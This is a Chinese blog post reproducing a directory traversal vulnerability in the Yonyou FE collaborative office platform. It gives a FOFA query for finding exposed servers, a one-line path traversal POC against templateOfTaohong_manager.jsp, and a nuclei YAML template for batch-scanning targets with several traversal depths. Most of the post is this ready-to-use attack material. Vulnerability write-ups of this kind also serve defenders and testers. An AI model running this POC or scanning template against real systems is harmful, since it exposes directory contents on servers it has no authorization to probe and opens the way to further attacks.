用友FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞

漏洞描述

用友 FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞,通过漏洞攻击者可以获取目录文件等信息,导致进一步攻击

漏洞影响

用友 FE协作办公平台

漏洞复现

fofa语法:"FE协作"
登录页面:

POC:
/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../

nuclei批量yaml文件

id: yonyou_FE_Manager_Directory_traversal

info:
  name: yonyou_FE_Manager_Directory_traversal
  author: bjx
  severity: high
  tags: yonyou,oa,FE,bjx
  description: fofa   "FE协作"
  reference:
    - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
requests:
  - method: GET
    path:
      - "{{BaseURL}}/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../"
      - "{{BaseURL}}/system/mediafile/templateOfTaohong_manager.jsp?path=/../../"
      - "{{BaseURL}}/system/mediafile/templateOfTaohong_manager.jsp?path=/../"
      - "{{BaseURL}}/system/mediafile/templateOfTaohong_manager.jsp?path=/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'onclick="uploadfile()"'
          - 'id="floder"'
          - 'onclick="newfloder'
        part: body
        condition: and

      - type: status
        status:
          - 200
posted @   学安全的小白  阅读(335)  评论(0编辑  收藏  举报
相关博文:
· 用友ERP-NC目录遍历漏洞
· 泛微E-cology filedownload目录遍历漏洞
· JEEVMS仓库管理系统任意文件读取漏洞
· web基础漏洞-目录遍历漏洞
· 用友crm客户关系管理help.php存在任意文件读取漏洞
阅读排行:
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
点击右上角即可分享
微信分享提示